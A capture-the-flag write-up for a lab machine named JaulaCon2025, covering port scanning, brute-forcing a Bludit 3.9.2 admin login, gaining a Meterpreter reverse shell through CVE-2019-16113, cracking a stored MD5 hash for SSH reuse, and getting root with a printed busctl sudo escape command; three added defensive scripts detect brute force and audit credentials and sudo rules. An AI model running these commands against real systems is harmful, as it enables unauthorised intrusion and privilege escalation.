JaulaCon2025

Enumeration

Let's start with an nmap scan:
```
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/nmap]
└─$ nmap -p- --open -sS -n -Pn -vvv --min-rate=5000 192.168.44.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-19 16:19 CEST
Initiating ARP Ping Scan at 16:19
Scanning 192.168.44.131 [1 port]
Completed ARP Ping Scan at 16:19, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 16:19
Scanning 192.168.44.131 [65535 ports]
Discovered open port 80/tcp on 192.168.44.131
Discovered open port 22/tcp on 192.168.44.131
Completed SYN Stealth Scan at 16:19, 0.74s elapsed (65535 total ports)
Nmap scan report for 192.168.44.131
Host is up, received arp-response (0.00044s latency).
Scanned at 2025-07-19 16:19:10 CEST for 1s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 00:0C:29:0F:FD:9F (VMware)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
```
Let's run a second scan to identify the service and version running on each open port:
```
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/nmap]
└─$ nmap -p22,80 -sCV 192.168.44.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-19 16:19 CEST
Nmap scan report for jaulacon2025.thl (192.168.44.131)
Host is up (0.00014s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 af:79:a1:39:80:45:fb:b7:cb:86:fd:8b:62:69:4a:64 (ECDSA)
|_  256 6d:d4:9d:ac:0b:f0:a1:88:66:b4:ff:f6:42:bb:f2:e5 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Bienvenido a Bludit | BLUDIT
|_http-generator: Bludit
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 00:0C:29:0F:FD:9F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds
```
Right, let's have a look at the web application:

It doesn't load correctly... most likely because a domain name is configured for it. Looking at the page source I find the following:

Let's add jaulacon2025.thl to our /etc/hosts:
```
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.44.131 jaulacon2025.thl
```
If we reload the page now it renders normally:

Notice that the name Bludit shows up several times. Searching for it, we find the following:

It is a CMS. Let's fuzz the site with ffuf to see whether we can pin down the exact CMS version:
```
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/nmap]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://jaulacon2025.thl/FUZZ" -e .php,.html,.txt,.js

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://jaulacon2025.thl/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .html .txt .js
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

0                       [Status: 200, Size: 4541, Words: 271, Lines: 137, Duration: 200ms]
admin                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 150ms]
install.php             [Status: 200, Size: 30, Words: 5, Lines: 1, Duration: 6ms]
robots.txt              [Status: 200, Size: 22, Words: 3, Lines: 2, Duration: 55ms]
LICENSE                 [Status: 200, Size: 1083, Words: 155, Lines: 22, Duration: 0ms]
```
Let's look at install.php:

No relevant information there; let's check robots.txt:

Nothing... So I decided to read Bludit's own documentation:

Let's browse to that path to see what is there and whether we can obtain the CMS version:

There is a version folder; let's open it:

Opening metadata.json we find the following:
```
{
    "author": "Bludit",
    "email": "",
    "website": "https://plugins.bludit.com",
    "version": "3.9.2",
    "releaseDate": "2019-06-21",
    "license": "MIT",
    "compatible": "3.9.2",
    "notes": ""
}
```
That gives us version 3.9.2; let's look up the latest available release:

The CMS is out of date, so let's look for a possible exploit. Searching, I found the following CVE:
But it requires credentials... Searching further, I found the following:

Shell as www-data

Let's use it to brute-force the login:
```
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ python3 Bludit-Auth-Bypass.py -l http://jaulacon2025.thl/admin/ -u /usr/share/wordlists/rockyou.txt -p /usr/share/wordlists/rockyou.txt
```
Note: the first time you run Bludit-Auth-Bypass.py it will ask you to install some requirements; I recommend doing that inside a virtual environment (venv).

After a while it found nothing... Then I remembered that the website displayed the following text, with no further explanation:

Let's add that user to a wordlist and run the brute-force script again:
```
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ python3 Bludit-Auth-Bypass.py -l http://jaulacon2025.thl/admin/ -u users -p /usr/share/wordlists/rockyou.txt
[..]
[*] ¡ÉXITO!
[+] Usar credencial -> Jaulacon2025:cassandra
```
It found the right credentials! Let's try them on the login page:
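From the defender's side, the brute force above leaves an obvious trace: a burst of POST requests to the Bludit admin login from one client. The following detector is an added example (it is not part of the write-up, of Bludit, or of the brute-force script): it parses Apache combined-format access log lines, counts login POSTs per client over a sliding one-minute window, and reports clients that exceed a threshold. The log lines, the threshold and the window size are constructed for illustration.

```python
"""Flag brute-force attempts against the Bludit admin login in Apache access logs.

Added example, not from the original write-up. Scans combined-format access
log lines for POST requests to the admin path and reports any client that
sends more than THRESHOLD of them inside a sliding WINDOW.
The sample log lines at the bottom are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" log format; the timestamp field uses %d/%b/%Y:%H:%M:%S %z.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

ADMIN_PATH = "/admin/"        # Bludit's login endpoint, as targeted in the write-up
THRESHOLD = 5                 # login POSTs per client per window before alerting (assumed value)
WINDOW = timedelta(minutes=1) # sliding window length (assumed value)


def parse_line(line):
    """Return (ip, datetime, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def detect_login_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: time_of_first_alert} for clients that send more than `threshold`
    POSTs to the admin login inside any `window`-long interval (per-client sliding window)."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        # Only login attempts count: POSTs to the admin path, ignoring any query string.
        if method != "POST" or path.split("?", 1)[0] != ADMIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        # Evict attempts that have fallen out of the window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts


# Constructed sample: one client hammers /admin/ once per second; another logs in normally.
SAMPLE_LOG = [
    '192.168.44.128 - - [19/Jul/2025:17:02:%02d +0200] "POST /admin/ HTTP/1.1" 200 4321 "-" "python-requests/2.32"' % s
    for s in range(0, 12)
] + [
    '192.168.44.50 - - [19/Jul/2025:17:05:01 +0200] "GET /admin/ HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '192.168.44.50 - - [19/Jul/2025:17:05:09 +0200] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: more than {THRESHOLD} login POSTs within {WINDOW} (first at {when})")
```

The detector keys on the source IP of the log line. If the web server sits behind a reverse proxy, use the log field that carries the real client address instead, or the whole burst collapses onto the proxy's IP. Rate-limiting the same endpoint at the web server (for example with a fail2ban-style jail fed by this pattern) turns the detection into a mitigation.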

Now we can exploit CVE-2019-16113, found earlier, and we'll do it with Metasploit. Let's launch it and select the exploit:
```
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ msfconsole
Metasploit tip: Save the current environment with the save command,
future console restarts will use this environment again
                                                  _ _
                                              / \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\

       =[ metasploit v6.4.69-dev                          ]
+ -- --=[ 2529 exploits - 1302 auxiliary - 432 post       ]
+ -- --=[ 1672 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search bludit

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/bludit_upload_images_exec

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(linux/http/bludit_upload_images_exec) >
```
Now we run show options to see which options the module needs before it can run:
```
msf6 exploit(linux/http/bludit_upload_images_exec) > show options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.44.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2

View the full module info with the info, or info -d command.
```
Let's fill in the requested values one by one:
```
msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS cassandra
BLUDITPASS => cassandra
msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER Jaulacon2025
BLUDITUSER => Jaulacon2025
msf6 exploit(linux/http/bludit_upload_images_exec) > set RHOST jaulacon2025.thl
RHOST => jaulacon2025.thl
```
Now we type run and see whether it works:
```
msf6 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 192.168.44.128:4444
[+] Logged in as: Jaulacon2025
[*] Retrieving UUID...
[*] Uploading AigqPgXPSs.png...
[*] Uploading .htaccess...
[*] Executing AigqPgXPSs.png...
[*] Sending stage (40004 bytes) to 192.168.44.131
[+] Deleted .htaccess
[*] Meterpreter session 1 opened (192.168.44.128:4444 -> 192.168.44.131:40574) at 2025-07-19 17:37:38 +0200
```
Now we type shell to get a regular shell on the machine:
```
meterpreter > shell
Process 3135 created.
Channel 0 created.
whoami
www-data
```

Shell as JaulaCon2025

Reading Bludit's documentation I found the following:

Its first lines say:

```
/bl-content/ <-- Databases and uploaded images
```

So that folder holds the databases; let's take a look at it:
```
www-data@JaulaCon2025:/var/www/html/bl-content/databases$ ls
ls
categories.php  plugins  site.php  tags.php
pages.php  security.php  syslog.php  users.php
www-data@JaulaCon2025:/var/www/html/bl-content/databases$
```
There is a users.php file; let's read it:
```
[..]
    "JaulaCon2025": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "551211bcd6ef18e32742a73fcb85430b",
        "salt": "jejej",
        "email": "",
        "registered": "2025-03-25 19:43:25",
        "tokenRemember": "",
        "tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}
```
We now have the MD5 hash of the JaulaCon2025 user's password. To confirm, let's read /etc/passwd and see whether that user also exists on the system:
```
www-data@JaulaCon2025:/var/www/html/bl-content/databases$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
JaulaCon2025:x:1001:1001::/home/JaulaCon2025:/bin/bash
```
It does exist. Let's use CrackStation to try to crack the password:
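Two weaknesses made this step trivial: the CMS stored a fast hash with a tiny salt, and the CMS account shared its username (and, as it turns out, its password) with a system account that has a login shell. The audit below is an added example, not part of the write-up or of Bludit. It assumes the users.php layout seen above: a one-line PHP guard followed by a JSON object keyed by username (the guard text in the sample is an assumption). It parses that file, classifies each stored hash by format, checks the salt length, and cross-references usernames against /etc/passwd entries that have a real shell. The sample data is constructed from the values shown in this write-up plus an invented admin account.

```python
"""Audit a Bludit users.php database for weak credential storage and for CMS
accounts that double as system accounts.

Added example; not from the write-up and not Bludit's own code. Assumes the
file is a PHP guard line followed by a JSON object keyed by username.
"""
import json
import re

HEX_RE = re.compile(r"^[0-9a-f]+$", re.I)
MIN_SALT_LEN = 16   # assumed policy value for salts on fast hashes


def load_bludit_db(text):
    """Skip everything before the first '{' (Bludit's PHP guard line) and parse the JSON."""
    start = text.find("{")
    if start < 0:
        raise ValueError("no JSON object found in database file")
    return json.loads(text[start:])


def classify_hash(value):
    """Rough format guess for a stored password value."""
    if value.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if value.startswith("$argon2"):
        return "argon2"
    if HEX_RE.match(value) and len(value) == 32:
        return "md5-like"
    if HEX_RE.match(value) and len(value) == 40:
        return "sha1-like"
    return "unknown"


def login_shell_users(passwd_text):
    """Usernames from /etc/passwd whose shell is neither nologin nor false."""
    users = set()
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) == 7 and not parts[6].endswith(("nologin", "false")):
            users.add(parts[0])
    return users


def audit(users_php_text, passwd_text, min_salt_len=MIN_SALT_LEN):
    """Return {username: [finding, ...]} for every CMS account with at least one issue."""
    db = load_bludit_db(users_php_text)
    shell_users = login_shell_users(passwd_text)
    findings = {}
    for name, rec in db.items():
        issues = []
        kind = classify_hash(rec.get("password", ""))
        if kind in ("md5-like", "sha1-like"):
            issues.append(f"fast hash ({kind}): offline dictionary attack is cheap even with a salt")
            # Salt length only matters for the fast schemes; bcrypt/argon2 carry their own salt.
            if len(rec.get("salt", "")) < min_salt_len:
                issues.append(f"salt shorter than {min_salt_len} characters")
        if name in shell_users:
            issues.append("same username has a login shell in /etc/passwd: password reuse exposes the host")
        if issues:
            findings[name] = issues
    return findings


# Constructed sample: the JaulaCon2025 record from the write-up plus an invented
# admin account stored with bcrypt (the hash string is a placeholder, not a real hash).
SAMPLE_USERS_PHP = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
  "admin": {"role": "admin", "password": "$2y$10$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLD", "salt": ""},
  "JaulaCon2025": {"role": "author", "password": "551211bcd6ef18e32742a73fcb85430b", "salt": "jejej"}
}
"""

# Constructed sample: a subset of the /etc/passwd lines seen on the box.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
JaulaCon2025:x:1001:1001::/home/JaulaCon2025:/bin/bash
"""

if __name__ == "__main__":
    for user, issues in audit(SAMPLE_USERS_PHP, SAMPLE_PASSWD).items():
        print(user)
        for issue in issues:
            print("  -", issue)
```

Run it against a copy of bl-content/databases/users.php and /etc/passwd pulled from a backup rather than on the live box. The remediation for the flagged account is the usual pair: a separate password for the CMS and the shell account, and a web server rule that keeps bl-content/databases/ from ever being served directly.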

Good! Let's try logging in over SSH:
```
┌──(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ ssh JaulaCon2025@192.168.44.131
JaulaCon2025@192.168.44.131's password:
Linux JaulaCon2025 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul 19 18:13:44 2025 from 192.168.44.128
JaulaCon2025@JaulaCon2025:~$
```

Shell as root

Let's check whether we have any sudoers privileges on the machine; for that we run sudo -l:
```
JaulaCon2025@JaulaCon2025:~$ sudo -l
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
Matching Defaults entries for JaulaCon2025 on JaulaCon2025:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User JaulaCon2025 may run the following commands on JaulaCon2025:
    (root) NOPASSWD: /usr/bin/busctl
```
Looking this binary up on GTFOBins gives the following way to abuse it:
```
sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/bash,argv1=-c,argv2='/bin/bash -i 0<&2 1>&2'
```
Let's exploit it:
```
JaulaCon2025@JaulaCon2025:~$ sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/bash,argv1=-c,argv2='/bin/bash -i 0<&2 1>&2'
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
root@JaulaCon2025:/home/JaulaCon2025# whoami
root
```
root! ;)
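The root step hinged on a single sudoers line, and that is the kind of thing an administrator can catch before a pentester does. The script below is an added example (not from the write-up, GTFOBins or sudo): it parses the `sudo -l` output format shown above, splits each rule into run-as user, tags and command, and flags rules that need no password, grant `ALL`, contain wildcards, or point at a binary known from GTFOBins to spawn a shell (the list here holds only busctl, the binary from this box, and is meant to be extended). The sample output is constructed from the write-up's `sudo -l` plus an invented benign rule.

```python
"""Audit `sudo -l` output for rules that hand out a root shell.

Added example, not from the write-up. Parses the human-readable `sudo -l`
listing (not the sudoers file itself) and scores each rule.
"""
import os
import re

# One rule line as printed by `sudo -l`: "(runas) TAG: TAG: command, command".
SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$"
)

# Binaries whose sudo entry is equivalent to a root shell. Seeded with the one
# from this box; extend it from gtfobins.github.io for your own environment.
SHELL_ESCAPE_BINARIES = {"busctl"}


def parse_sudo_l(output):
    """Return a list of {'runas', 'tags', 'command'} dicts from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # rule lines follow this header
            continue
        if not in_rules:
            continue                 # skip the warning and "Matching Defaults" block
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip().upper() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmd").split(","):
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd.strip()})
    return rules


def assess(rules):
    """Return [(command, runas, [reasons])] for every rule with at least one risk indicator."""
    findings = []
    for r in rules:
        cmd = r["command"]
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command")
            base = "ALL"
        else:
            base = os.path.basename(cmd.split()[0])
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
        if base in SHELL_ESCAPE_BINARIES:
            reasons.append(f"{base} can spawn a shell (GTFOBins)")
        if "*" in cmd:
            reasons.append("wildcard in arguments")
        if reasons:
            findings.append((cmd, r["runas"], reasons))
    return findings


# Constructed sample: the `sudo -l` output from this box plus an invented harmless rule.
SAMPLE_SUDO_L = """sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
Matching Defaults entries for JaulaCon2025 on JaulaCon2025:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, use_pty

User JaulaCon2025 may run the following commands on JaulaCon2025:
    (root) NOPASSWD: /usr/bin/busctl
    (root) /usr/bin/systemctl status apache2
"""

if __name__ == "__main__":
    for cmd, runas, reasons in assess(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd} as {runas}: " + "; ".join(reasons))
```

The fix for the flagged rule is to delete it, not to narrow it with an argument pattern: sudoers wildcards match across argument boundaries, and busctl accepts its connection options anywhere on the command line, so a pattern-restricted rule still leaves the door open.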